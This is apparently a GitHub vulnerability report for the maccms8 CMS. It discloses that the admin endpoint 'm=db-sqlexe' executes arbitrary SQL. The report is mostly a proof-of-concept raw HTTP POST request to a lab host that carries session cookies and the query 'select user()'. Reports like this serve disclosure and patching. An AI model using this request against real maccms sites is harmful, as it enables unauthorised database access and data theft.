maccmspro/maccms8

Background arbitrary sql statement execution vulnerability

Closed this issue · 0 comments

Vulnerability Product:maccms8
Vulnerability type:sql injection
Vulnerability Details:
poc
select user();

POST /admin/index.php?m=db-sqlexe HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 90
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.3.129:8091
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin/index.php?m=db-sql
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cms_ds_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJtYXN0ZXIiLCJpc3MiOiJKUkNtcyIsInN1YiI6IkpSQ21zLURhc2hib2FyZCIsImV4cCI6MTY5ODgxOTIzNn0.IbsTyYy5sJZlBDtgIiOb9G6idpa9b2LkWioRlSMlSEA; PHPSESSID=7nt0ps450m3j96ond3v3tlsin7; adminlevels=b%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj
Connection: close

__token__=fa81cc5a252087355ee330c91096cdde&sql=select+user%28%29&Submit=%E6%89%A7%E8%A1%8C

image